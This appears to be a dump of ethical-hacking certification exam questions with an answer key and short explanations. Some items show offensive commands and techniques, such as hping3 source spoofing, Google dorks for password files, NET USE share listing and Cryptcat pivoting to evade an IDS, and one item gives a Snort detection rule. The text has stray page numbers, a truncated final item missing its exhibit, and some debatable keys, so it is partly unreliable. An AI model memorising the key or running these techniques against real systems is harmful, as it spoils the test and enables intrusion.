314 Which of the following is assured by the use of a hash? A. Integrity B. Confidentiality C. Authentication D. Availability

A (Explanation: An important application of secure hashes is verification of message integrity. Determining whether any changes have been made to a message (or a file), for example, can be accomplished by comparing message digests calculated before, and after, transmission (or any other event). References: https://en.wikipedia.org/wiki/Cryptographic_hash_function#Verifying_the_integrity_of_files_or_mes sages)

340 Which of the following is designed to identify malicious attempts to penetrate systems? A. Intrusion Detection System B. Firewall C. Proxy D. Router

A (Explanation: An intrusion detection system (IDS) is a device or software application that monitors network or 194 system activities for malicious activities or policy violations and produces electronic reports to a management station. References: https://en.wikipedia.org/wiki/Intrusion_detection_system)

323 Which of the following is considered the best way to protect Personally Identifiable Information (PII) from Web application vulnerabilities? A. Use cryptographic storage to store all PII B. Use encrypted communications protocols to transmit PII C. Use full disk encryption on all hard drives to protect PII D. Use a security token to log into all Web applications that use PII

A (Explanation: As a matter of good practice any PII should be protected with strong encryption. References: https://cuit.columbia.edu/cuit/it-security-practices/handling-personally-identifyinginformation)

282 You are attempting to man-in-the-middle a session. Which protocol will allow you to guess a sequence number? A. TCP B. UPD C. ICMP D. UPX

A (Explanation: At the establishment of a TCP session the client starts by sending a SYN-packet (SYN=synchronize) with a sequence number. To hijack a session it is required to send a packet with a right seq-number, otherwise they are dropped. References: https://www.exploit-db.com/papers/13587/)

325 An Internet Service Provider (ISP) has a need to authenticate users connecting using analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network. Which AAA protocol is most likely able to handle this requirement? A. RADIUS B. DIAMETER C. Kerberos D. TACACS+

A (Explanation: Because of the broad support and the ubiquitous nature of the RADIUS protocol, it is often used by ISPs and enterprises to manage access to the Internet or internal networks, wireless networks, and integrated e-mail services. These networks may incorporate modems, DSL, access points, VPNs, network ports, web servers, etC. References: https://en.wikipedia.org/wiki/RADIUS)

237 It is a short-range wireless communication technology intended to replace the cables connecting portable of fixed devices while maintaining high levels of security. It allows mobile phones, computers and other devices to connect and communicate using a short-range wireless connection. Which of the following terms best matches the definition? A. Bluetooth B. Radio-Frequency Identification C. WLAN D. InfraRed

A (Explanation: Bluetooth is a standard for the short-range wireless interconnection of mobile phones, computers, and other electronic devices. References: http://www.bbc.co.uk/webwise/guides/about-bluetooth)

343 Which method of password cracking takes the most time and effort? A. Brute force B. Rainbow tables C. Dictionary attack D. Shoulder surfing

A (Explanation: Brute-force cracking, in which a computer tries every possible key or password until it succeeds, is typically very time consuming. More common methods of password cracking, such as dictionary attacks, pattern checking, word list substitution, etc. attempt to reduce the number of trials required and will usually be attempted before brute forcE. References: https://en.wikipedia.org/wiki/Password_cracking 196)

291 When you are testing a web application, it is very useful to employ a proxy tool to save every request and response. You can manually test every request and analyze the response to find vulnerabilities. You can test parameter and headers manually to get more precise results than if using web vulnerability scanners. What proxy tool will help you find web vulnerabilities? A. Burpsuite B. Maskgen C. Dimitry D. Proxychains

A (Explanation: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. References: https://portswigger.net/burp/)

259 When you return to your desk after a lunch break, you notice a strange email in your inbox. The sender is someone you did business with recently, but the subject line has strange characters in it. What should you do? A. Forward the message to your company's security response team and permanently delete the message from your computer. B. Reply to the sender and ask them for more information about the message contents. C. Delete the email and pretend nothing happened D. Forward the message to your supervisor and ask for her opinion on how to handle the situation

A (Explanation: By setting up an email address for your users to forward any suspicious email to, the emails can be automatically scanned and replied to, with security incidents created to follow up on any emails with attached malware or links to known bad websites. References: https://docs.servicenow.com/bundle/helsinki-securitymanagement/ page/product/threat-intelligence/task/t_ConfigureScanEmailInboundAction.html)

279 Using Windows CMD, how would an attacker list all the shares to which the current user context has access? A. NET USE B. NET CONFIG C. NET FILE D. NET VIEW

A (Explanation: Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. References: https://technet.microsoft.com/en-us/library/bb490717.aspx)

324 Which of the following is one of the most effective ways to prevent Cross-site Scripting (XSS) flaws in software applications? A. Validate and escape all information sent to a server B. Use security policies and procedures to define and implement proper security settings C. Verify access right before allowing access to protected information and UI controls D. Use digital certificates to authenticate a server prior to sending data

A (Explanation: Contextual output encoding/escaping could be used as the primary defense mechanism to stop Cross-site Scripting (XSS) attacks. References: https://en.wikipedia.org/wiki/Crosssite_ scripting#Contextual_output_encoding.2Fescaping_of_string_input)

724 Joseph has just been hired on to a contractor company of the Department of Defense as their Senior Security Analyst. Joseph has been instructed on the company's strict security policies that have been implemented, and the policies that have yet to be put in place. Per the Department of Defense, all DoD users and the users of their contractors must use two-factor authentication to access their networks. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company. Joseph's supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. Joseph's company has already researched using smart cards and all the resources needed to implement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication? A. Biometric device B. OTP C. Proximity cards D. Security token

D ( Security token)

321 A company's security policy states that all Web browsers must automatically delete their HTTP browser cookies upon terminating. What sort of security breach is this policy attempting to mitigate? A. Attempts by attackers to access Web sites that trust the Web browser user by stealing the user's authentication credentials. B. Attempts by attackers to access the user and password information stored in the company's SQL database C. Attempts by attackers to access passwords stored on the user's computer without the user's knowledge D. Attempts by attackers to determine the user's Web browser usage patterns, including when sites were visited and for how long.

A (Explanation: Cookies can store passwords and form content a user has previously entered, such as a credit card number or an address. Cookies can be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfiltered HTML and JavaScript content. References: https://en.wikipedia.org/wiki/HTTP_cookie#Crosssite_ scripting_.E2.80.93_cookie_theft)

734 Why attackers use proxy servers? A. To ensure the exploits used in the attacks always flip reverse vectors B. Faster bandwidth performance and increase in attack speed C. Interrupt the remote victim's network traffic and reroute the packets to attackers machine D. To hide the source IP address so that an attacker can hack without any legal corollary

D ( To hide the source IP address so that an attacker can hack without any legal corollary)

743 Perimeter testing means determining exactly what your firewall blocks and what it allows. To conduct a good test, you can spoof source IP addresses and source ports. Which of the following command results in packets that will appear to originate from the system at 10.8.8.8? Such a packet is useful for determining whether the firewall is allowing random packets in or out of your network. A. hping3 -T 10.8.8.8 -S netbios -c 2 -p 80 B. hping3 -Y 10.8.8.8 -S windows -c 2 -p 80 C. hping3 -O 10.8.8.8 -S server -c 2 -p 80 D. hping3 -a 10.8.8.8 -S springfield -c 2 -p 80

D ( hping3 -a 10.8.8.8 -S springfield -c 2 -p 80)

210 _____ is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer A. Steganography B. Merge Streams C. NetBIOS vulnerability D. Alternate Data Streams

D (Explanation: ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams and the data streams are accessed by filename:stream.)

50 An Nmap scan shows the following open ports, and nmap also reports that the OS guessing results to match too many signatures hence it cannot reliably be identified: 21 ftp 23 telnet 80 http 443 https What does this suggest ? 31 A. This is a Windows Domain Controller B. The host is not firewalled C. The host is not a Linux or Solaris system D. The host is not properly patched

D (Explanation: If the answer was A nmap would guess it, it holds the MS signature database, the host not being firewalled makes no difference. The host is not linux or solaris, well it very well could be. The host is not properly patched? That is the closest; nmaps OS detection architecture is based solely off the TCP ISN issued by the operating systems TCP/IP stack, if the stack is modified to show output from randomized ISN's or if your using a program to change the ISN then OS detection will fail. If the TCP/IP IP ID's are modified then os detection could also fail, because the machine would most likely come back as being down.)

320 While performing online banking using a Web browser, a user receives an email that contains a link to an interesting Web site. When the user clicks on the link, another Web browser session starts and displays a video of cats playing a piano. The next business day, the user receives what looks like an email from his bank, indicating that his bank account has been accessed from a foreign country. The email asks the user to call his bank and verify the authorization of a funds transfer that took place. What Web browser-based security vulnerability was exploited to compromise the user? A. Cross-Site Request Forgery B. Cross-Site Scripting C. Clickjacking D. Web form input validation

A (Explanation: Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. Example and characteristics If an attacker is able to find a reproducible link that executes a specific action on the target page while the victim is being logged in there, he is able to embed such link on a page he controls and trick the victim into opening it. The attack carrier link may be placed in a location that the victim is likely to visit while logged into the target site (e.g. a discussion forum), sent in a HTML email body or attachment.)

239 You have compromised a server and successfully gained a root access. You want to pivot and pass traffic undetected over the network and evade any possible Intrusion Detection System. What is the best approach? A. Install Cryptcat and encrypt outgoing packets from this server. B. Install and use Telnet to encrypt all outgoing traffic from this server. C. Use Alternate Data Streams to hide the outgoing packets from this server. D. Use HTTP so that all traffic can be routed via a browser, thus evading the internal Intrusion Detection Systems.

A (Explanation: Cryptcat enables us to communicate between two systems and encrypts the communication between them with twofish. References: http://null-byte.wonderhowto.com/how-to/hack-like-pro-create-nearly-undetectablebackdoor- with-cryptcat-0149264/)

304 This phase will increase the odds of success in later phases of the penetration test. It is also the very first step in Information Gathering, and it will tell you what the "landscape" looks like. What is the most important phase of ethical hacking in which you need to spend a considerable amount of time? A. footprinting B. network mapping C. gaining access D. escalating privileges

A (Explanation: Footprinting is a first step that a penetration tester used to evaluate the security of any IT infrastructure, footprinting means to gather the maximum information about the computer system or a network and about the devices that are attached to this network. References: http://www.ehacking.net/2011/02/footprinting-first-step-of-ethical.html)

330 Which of the following security operations is used for determining the attack surface of an organization? A. Running a network scan to detect network services in the corporate DMZ B. Training employees on the security policy regarding social engineering C. Reviewing the need for a security clearance for each employee D. Using configuration management to determine when and where to apply security patches

A (Explanation: For a network scan the goal is to document the exposed attack surface along with any easily detected vulnerabilities. References: http://meisecurity.com/home/consulting/consulting-network-scanning/)

54 Because UDP is a connectionless protocol: (Select 2) A. UDP recvfrom() and write() scanning will yield reliable results B. It can only be used for Connect scans C. It can only be used for SYN scans D. There is no guarantee that the UDP packets will arrive at their destination E. ICMP port unreachable messages may not be returned successfully

D,E (Explanation: Neither UDP packets, nor the ICMP errors are guaranteed to arrive, so UDP scanners must also implement retransmission of packets that appear to be lost (or you will get a bunch of false positives).)

335 To determine if a software program properly handles a wide range of invalid input, a form of automated testing can be used to randomly generate invalid input in an attempt to crash the program. What term is commonly used when referring to this type of testing? A. Fuzzing B. Randomizing C. Mutating D. Bounding

A (Explanation: Fuzz testing or fuzzing is a software testing technique, often automated or semi-automated, that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems. It is a form of random testing which has been used for testing hardware or softwarE. References: https://en.wikipedia.org/wiki/Fuzz_testing 191)

228 Assuring two systems that are using IPSec to protect traffic over the internet, what type of general attack could compromise the data? A. Spoof Attack B. Smurf Attack C. Man in the Middle Attack D. Trojan Horse Attack E. Back Orifice Attack

D,E Explanation: To compromise the data, the attack would need to be executed before the encryption takes place 137 at either end of the tunnel. Trojan Horse and Back Orifice attacks both allow for potential data manipulation on host computers. In both cases, the data would be compromised either before encryption or after decryption, so IPsec is not preventing the attack.)

287 When you are collecting information to perform a data analysis, Google commands are very useful to find sensitive information and files. These files may contain information about passwords, system functions, or documentation. What command will help you to search files using Google as a search engine? A. site: target.com filetype:xls username password email B. inurl: target.com filename:xls username password email C. domain: target.com archive:xls username password email D. site: target.com file:xls username password email

A (Explanation: If you include site: in your query, Google will restrict your search results to the site or domain you specify. If you include filetype:suffix in your query, Google will restrict the results to pages whose names end in suffix. For example, [ web page evaluation checklist filetype:pdf ] will return Adobe Acrobat pdf files that match the terms "web," "page," "evaluation," and "checklist." References: http://www.googleguide.com/advanced_operators_reference.html)

263 During a recent security assessment, you discover the organization has one Domain Name Server (DNS) in a Demilitarized Zone (DMZ) and a second DNS server on the internal network. What is this type of DNS configuration commonly called? A. Split DNS B. DNSSEC C. DynDNS D. DNS Scheme

A (Explanation: In a split DNS infrastructure, you create two zones for the same domain, one to be used by the internal network, the other used by the external network. Split DNS directs internal hosts to an internal domain name server for name resolution and external hosts are directed to an external domain name server for name resolution. References: http://www.webopedia.com/TERM/S/split_DNS.html)

238 A hacker has successfully infected an internet-facing server which he will then use to send junk mail, take part in coordinated attacks, or host junk email content. Which sort of trojan infects this server? A. Botnet Trojan B. Turtle Trojans C. Banking Trojans D. Ransomware Trojans

A (Explanation: In computer science, a zombie is a computer connected to the Internet that has been compromised by a hacker, computer virus or trojan horse and can be used to perform malicious tasks of one sort or another under remote direction. Botnets of zombie computers are often used to spread e-mail spam and launch denial-of-service attacks. Most owners of zombie computers are unaware that their system is being used in this way. Because the owner tends to be unaware, these computers are metaphorically compared to zombies. A coordinated DDoS attack by multiple botnet machines also resembles a zombie horde attack.)

269 Jesse receives an email with an attachment labeled "Court_Notice_21206.zip". Inside the zip file is a file named "Court_Notice_21206.docx.exe" disguised as a word document. Upon execution, a window appears stating, "This word document is corrupt." In the background, the file copies itself to Jesse APPDATA\local directory and begins to beacon to a C2 server to download additional malicious binaries. What type of malware has Jesse encountered? A. Trojan B. Worm C. Macro Virus D. Key-Logger

A (Explanation: In computing, Trojan horse, or Trojan, is any malicious computer program which is used to hack into a computer by misleading users of its true intent. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller which can then have unauthorized access to the affected computer. References: https://en.wikipedia.org/wiki/Trojan_horse_(computing))

331 The security concept of "separation of duties" is most similar to the operation of which type of security device? A. Firewall B. Bastion host C. Intrusion Detection System D. Honeypot

A (Explanation: In most enterprises the engineer making a firewall change is also the one reviewing the firewall metrics for unauthorized changes. What if the firewall administrator wanted to hide something? How would anyone ever find out? This is where the separation of duties comes in to focus on the responsibilities of tasks within security. References: http://searchsecurity.techtarget.com/tip/Modern-security-management-strategyrequires- security-separation-of-duties)

274 Jimmy is standing outside a secure entrance to a facility. He is pretending to have a tense conversation on his cell phone as an authorized employee badges in. Jimmy, while still on the phone, grabs the door as it begins to close. What just happened? A. Piggybacking B. Masqurading C. Phishing D. Whaling

A (Explanation: In security, piggybacking refers to when a person tags along with another person who is authorized to gain entry into a restricted area, or pass a certain checkpoint. References: https://en.wikipedia.org/wiki/Piggybacking_(security))

347 Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a linux platform? A. Kismet B. Nessus C. Netstumbler D. Abel

A (Explanation: Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. References: https://en.wikipedia.org/wiki/Kismet_(software))

270 Which tool allows analysts and pen testers to examine links between data using graphs and link analysis? A. Maltego B. Cain & Abel C. Metasploit D. Wireshark

A (Explanation: Maltego is proprietary software used for open-source intelligence and forensics, developed by Paterva. Maltego focuses on providing a library of transforms for discovery of data from open sources, and visualizing that information in a graph format, suitable for link analysis and data mining. References: https://en.wikipedia.org/wiki/Maltego)

322 A company's Web development team has become aware of a certain type of security vulnerability in their Web software. To mitigate the possibility of this vulnerability being exploited, the team wants to modify the software requirements to disallow users from entering HTML as input into their Web application. What kind of Web application vulnerability likely exists in their software? A. Cross-site scripting vulnerability B. Cross-site Request Forgery vulnerability C. SQL injection vulnerability D. Web site defacement vulnerability

A (Explanation: Many operators of particular web applications (e.g. forums and webmail) allow users to utilize a limited subset of HTML markup. When accepting HTML input from users (say, <b>very</b> large), output encoding (such as &lt;b&gt;very&lt;/b&gt; large) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "very large", instead of "<b>very</b> large"). Stopping an XSS attack when accepting HTML input from users is much more complex in this situation. Untrusted HTML input must be run through an HTML sanitization engine to ensure that it does not contain cross-site scripting codE. References: https://en.wikipedia.org/wiki/Crosssite_ scripting#Safely_validating_untrusted_HTML_input)

286 You are performing information gathering for an important penetration test. You have found pdf, doc, and images in your objective. You decide to extract metadata from these files and analyze it. What tool will help you with the task? A. Metagoofil B. Armitage C. Dimitry D. cdpsnarf

A (Explanation: Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,docx,pptx,xlsx) belonging to a target company. Metagoofil will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries like Hachoir, PdfMiner? and others. With the results it will generate a report with usernames, software versions and servers or machine names that will help Penetration testers in the information gathering phase. References: http://www.edge-security.com/metagoofil.php)

284 Which regulation defines security and privacy controls for Federal information systems and organizations? A. NIST-800-53 B. PCI-DSS C. EU Safe Harbor D. HIPAA

A (Explanation: NIST Special Publication 800-53, "Security and Privacy Controls for Federal Information Systems and Organizations," provides a catalog of security controls for all U.S. federal information systems except those related to national security. References: https://en.wikipedia.org/wiki/NIST_Special_Publication_800-53)

306 > NMAP -sn 192.168.11.200-215 The NMAP command above performs which of the following? A. A ping scan B. A trace sweep C. An operating system detect D. A port scan

A (Explanation: NMAP -sn (No port scan) This option tells Nmap not to do a port scan after host discovery, and only print out the available hosts that responded to the host discovery probes. This is often known as a "ping scan", but you can also request that traceroute and NSE host scripts be run. References: https://nmap.org/book/man-host-discovery.html)

255 Your company was hired by a small healthcare provider to perform a technical assessment on the network. What is the best approach for discovering vulnerabilities on a Windows-based computer? A. Use a scan tool like Nessus B. Use the built-in Windows Update tool C. Check MITRE.org for the latest list of CVE findings D. Create a disk image of a clean Windows installation

A (Explanation: Nessus is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture for easy cross-linking between compliant security tools. The Nessus server is currently available for Unix, Linux and FreeBSD. The client is available for Unix- or Windows-based operating systems. Note: Significant capabilities of Nessus include: References: http://searchnetworking.techtarget.com/definition/Nessus)

351 What does a firewall check to prevent particular ports and applications from getting packets into an organization? A. Transport layer port numbers and application layer headers B. Presentation layer headers and the session layer port numbers C. Network layer headers and the session layer port numbers D. Application layer port numbers and the transport layer headers

A (Explanation: Newer firewalls can filter traffic based on many packet attributes like source IP address, source port, destination IP address or transport layer port, destination service like WWW or FTP. They can filter based on protocols, TTL values, netblock of originator, of the source, and many other attributes. Application layer firewalls are responsible for filtering at 3, 4, 5, 7 layer. Because they analyze the application layer headers, most firewall control and filtering is performed actually in the softwarE. References: https://en.wikipedia.org/wiki/Firewall_(computing)#Network_layer_or_packet_filters http://howdoesinternetwork.com/2012/application-layer-firewalls)

345 Which of the following tools performs comprehensive tests against web servers, including dangerous files and CGIs? A. Nikto B. Snort C. John the Ripper D. Dsniff

A (Explanation: Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updateD. References: https://en.wikipedia.org/wiki/Nikto_Web_Scanner)

348 Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, smallsized packets to the target computer, making it very difficult for an IDS to detect the attack signatures. Which tool can be used to perform session splicing attacks? A. Whisker B. tcpsplice C. Burp D. Hydra

A (Explanation: One basic technique is to split the attack payload into multiple small packets, so that the IDS must reassemble the packet stream to detect the attack. A simple way of splitting packets is by fragmenting them, but an adversary can also simply craft packets with small payloads. The 'whisker' evasion tool calls crafting packets with small payloads 'session splicing'. References: https://en.wikipedia.org/wiki/Intrusion_detection_system_evasion_techniques#Fragmentation_and _small_packets)

272 Perspective clients want to see sample reports from previous penetration tests. What should you do next? A. Decline but, provide references. B. Share full reports, not redacted C. Share full reports with redactions. D. Share reports, after NDA is signed.

A (Explanation: Penetration tests data should not be disclosed to third parties.)

8 Bluetooth uses which digital modulation technique to exchange information between paired devices? A. PSK (phase-shift keying) B. FSK (frequency-shift keying) C. ASK (amplitude-shift keying) D. QAM (quadrature amplitude modulation)

A (Explanation: Phase shift keying is the form of Bluetooth modulation used to enable the higher data rates achievable with Bluetooth 2 EDR (Enhanced Data Rate). Two forms of PSK are used: /4 DQPSK, and 8DPSK. References: http://www.radio-electronics.com/info/wireless/bluetooth/radio-interfacemodulation. php 6)

283 Your team has won a contract to infiltrate an organization. The company wants to have the attack be as realistic as possible; therefore, they did not provide any information besides the company name. What should be the first step in security testing the client? A. Reconnaissance B. Enumeration C. Scanning D. Escalation

A (Explanation: Phases of hacking Phase 1—Reconnaissance Phase 2—Scanning Phase 3—Gaining Access Phase 4—Maintaining Access Phase 5—Covering Tracks Phase 1: Passive and Active Reconnaissance 156 References: http://hack-o-crack.blogspot.se/2010/12/five-stages-of-ethical-hacking.html)

309 The configuration allows a wired or wireless network interface controller to pass all traffic it receives to the central processing unit (CPU), rather than passing only the frames that the controller is intended to receive. Which of the following is being described? A. promiscuous mode B. port forwarding C. multi-cast mode D. WEM

A (Explanation: Promiscuous mode refers to the special mode of Ethernet hardware, in particular network interface cards (NICs), that allows a NIC to receive all traffic on the network, even if it is not addressed to this NIC. By default, a NIC ignores all traffic that is not addressed to it, which is done by comparing the destination address of the Ethernet packet with the hardware address (a.k.a. MAC) of the device. While this makes perfect sense for networking, non-promiscuous mode makes it difficult to use network monitoring and analysis software for diagnosing connectivity issues or traffic accounting. References: https://www.tamos.com/htmlhelp/monitoring/)

342 PGP, SSL, and IKE are all examples of which type of cryptography? A. Public Key B. Secret Key C. Hash Algorithm D. Digest

A (Explanation: Public-key algorithms are fundamental security ingredients in cryptosystems, applications and protocols. They underpin various Internet standards, such as Secure Sockets Layer (SSL),Transport Layer Security (TLS), S/MIME, PGP, Internet Key Exchange (IKE or IKEv2), and GPG. References: https://en.wikipedia.org/wiki/Public-key_cryptography)

293 This asymmetry cipher is based on factoring the product of two large prime numbers. What cipher is described above? A. RSA B. SHA C. RC5 D. MD5

A (Explanation: RSA is based on the practical difficulty of factoring the product of two large prime numbers, the factoring problem. Note: A user of RSA creates and then publishes a public key based on two large prime numbers, along with an auxiliary value. The prime numbers must be kept secret. Anyone can use the public 163 key to encrypt a message, but with currently published methods, if the public key is large enough, only someone with knowledge of the prime numbers can feasibly decode the messagE. References: https://en.wikipedia.org/wiki/RSA_(cryptosystem))

240 It is a kind of malware (malicious software) that criminals install on your computer so they can lock it from a remote location. This malware generates a pop-up window, webpage, or email warning from what looks like an official authority. It explains that your computer has been locked because of possible illegal activities on it and demands payment before you can access your files and programs again. Which of the following terms best matches the definition? A. Ransomware B. Adware C. Spyware D. Riskware

A (Explanation: Ransomware is a type of malware that can be covertly installed on a computer without knowledge or intention of the user that restricts access to the infected computer system in some way, and demands that the user pay a ransom to the malware operators to remove the restriction. Some forms of ransomware systematically encrypt files on the system's hard drive, which become difficult or impossible to decrypt without paying the ransom for the encryption key, while some may simply lock the system and display messages intended to coax the user into paying. Ransomware typically propagates as a Trojan. References: https://en.wikipedia.org/wiki/Ransomware)

249 What is the benefit of performing an unannounced Penetration Testing? A. The tester will have an actual security posture visibility of the target network. B. Network security would be in a "best state" posture C. It is best to catch critical infrastructure unpatched D. The tester could not provide an honest analysis.

A (Explanation: Real life attacks will always come without expectation and they will often arrive in ways that are highly creative and very hard to plan for at all. This is, after all, exactly how hackers continue to succeed against network security systems, despite the billions invested in the data protection industry. A possible solution to this danger is to conduct intermittent "unannounced" penentration tests whose scheduling and occurrence is only known to the hired attackers and upper management staff instead of every security employee, as would be the case with "announced" penetration tests that everyone has planned for in advance. The former may be better at detecting realistic weaknesses. References: http://www.sitepronews.com/2013/03/20/the-pros-and-cons-of-penetration-testing/)

253 Which of the following is a component of a risk assessment? A. Administrative safeguards B. Physical security C. DMZ D. Logical interface

A (Explanation: Risk assessment include: References: https://en.wikipedia.org/wiki/IT_risk_management#Risk_assessment)

245 What is the best description of SQL Injection? A. It is an attack used to gain unauthorized access to a database. B. It is an attack used to modify code in an application. C. It is a Man-in-the-Middle attack between your SQL Server and Web App Server. D. It is a Denial of Service Attack.

A (Explanation: SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). References: https://en.wikipedia.org/wiki/SQL_injection)

344 What is the most common method to exploit the "Bash Bug" or "ShellShock" vulnerability? A. Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable to a vulnerable Web server B. Manipulate format strings in text fields C. SSH D. SYN Flood

A (Explanation: Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell. One specific exploitation vector of the Shellshock bug is CGI-based web servers. Note: When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the system call, Bash will receive the environment variables passed by the server and will process them. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request. References: https://en.wikipedia.org/wiki/Shellshock_(software_bug)#Specific_exploitation_vectors)

258 It is a vulnerability in GNU's bash shell, discovered in September of 2014, that gives attackers access to run remote commands on a vulnerable system. The malicious software can take control of an infected machine, launch denial-of-service attacks to disrupt websites, and scan for other vulnerable devices (including routers). Which of the following vulnerabilities is being described? A. Shellshock B. Rootshock C. Rootshell D. Shellbash

A (Explanation: Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. References: https://en.wikipedia.org/wiki/Shellshock_(software_bug) 139)

248 You just set up a security system in your network. In what kind of system would you find the following string of characters used as a rule within its configuration? alert tcp any any -> 192.168.100.0/24 21 (msg: "FTP on the network!";) A. An Intrusion Detection System B. A firewall IPTable C. A Router IPTable D. FTP Server rule

A (Explanation: Snort is an open source network intrusion detection system (NIDS) for networks . Snort rule example: This example is a rule with a generator id of 1000001. alert tcp any any -> any 80 (content:"BOB"; gid:1000001; sid:1; rev:1;) References: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node31.html)

341 Which of the following is a low-tech way of gaining unauthorized access to systems? A. Social Engineering B. Sniffing C. Eavesdropping D. Scanning

A (Explanation: Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access. References: https://en.wikipedia.org/wiki/Social_engineering_(security))

289 You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist's email, and you send her an email changing the source email to her boss's email( boss@company ). In this email, you ask for a pdf with information. She reads your email and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain malware) and send back the modified pdf, saying that the links don't work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What testing method did you use? A. Social engineering B. Tailgating C. Piggybacking D. Eavesdropping

A (Explanation: Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme.)

355 Ricardo wants to send secret messages to a competitor company. To secure these messages, he uses a technique of hiding a secret message within an ordinary message. The technique provides 'security through obscurity'. What technique is Ricardo using? A. Steganography B. Public-key cryptography C. RSA algorithm D. Encryption

A (Explanation: Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video. References: https://en.wikipedia.org/wiki/Steganography 204)

256 Nation-state threat actors often discover vulnerabilities and hold on to them until they want to launch a sophisticated attack. The Stuxnet attack was an unprecedented style of attack because it used four types of vulnerability. What is this style of attack called? A. zero-day B. zero-hour C. zero-sum D. no-day

A (Explanation: Stuxnet is a malicious computer worm believed to be a jointly built American-Israeli cyber weapon. Exploiting four zero-day flaws, Stuxnet functions by targeting machines using the Microsoft Windows operating system and networks, then seeking out Siemens Step7 softwarE. References: https://en.wikipedia.org/wiki/Stuxnet)

307 You are using NMAP to resolve domain names into IP addresses for a ping sweep later. Which of the following commands looks for IP addresses? A. >host -t a hackeddomain.com B. >host -t soa hackeddomain.com C. >host -t ns hackeddomain.com D. >host -t AXFR hackeddomain.com

A (Explanation: The A record is an Address record. It returns a 32-bit IPv4 address, most commonly used to map hostnames to an IP address of the host. References: https://en.wikipedia.org/wiki/List_of_DNS_record_types)

252 It is a regulation that has a set of guidelines, which should be adhered to by anyone who handles any electronic medical data. These guidelines stipulate that all medical practices must ensure that all necessary measures are in place while saving, accessing, and sharing any electronic medical data to keep patient data secure. Which of the following regulations best matches the description? A. HIPAA B. ISO/IEC 27002 C. COBIT D. FISMA

A (Explanation: The HIPAA Privacy Rule regulates the use and disclosure of Protected Health Information (PHI) held by "covered entities" (generally, health care clearinghouses, employer sponsored health plans, health insurers, and medical service providers that engage in certain transactions.)[15] By regulation, the Department of Health and Human Services extended the HIPAA privacy rule to independent contractors of covered entities who fit within the definition of "business associates". References: https://en.wikipedia.org/wiki/Health_Insurance_Portability_and_Accountability_Act#Privacy_Rule)

301 A penetration tester is conducting a port scan on a specific host. The tester found several ports opened that were confusing in concluding the Operating System (OS) version installeD. Considering the NMAP result below, which of the following is likely to be installed on the target machine by the OS? Starting NMAP 5.21 at 2011-03-15 11:06 NMAP scan report for 172.16.40.65 Host is up (1.00s latency). Not shown: 993 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:00:48:0D:EE:8 A. The host is likely a printer. B. The host is likely a Windows machine. C. The host is likely a Linux machine. D. The host is likely a router.

A (Explanation: The Internet Printing Protocol (IPP) uses port 631. References: https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers)

294 Which of the following parameters describe LM Hash (see exhibit): Exhibit: A. I, II, and III B. I C. II D. I and II

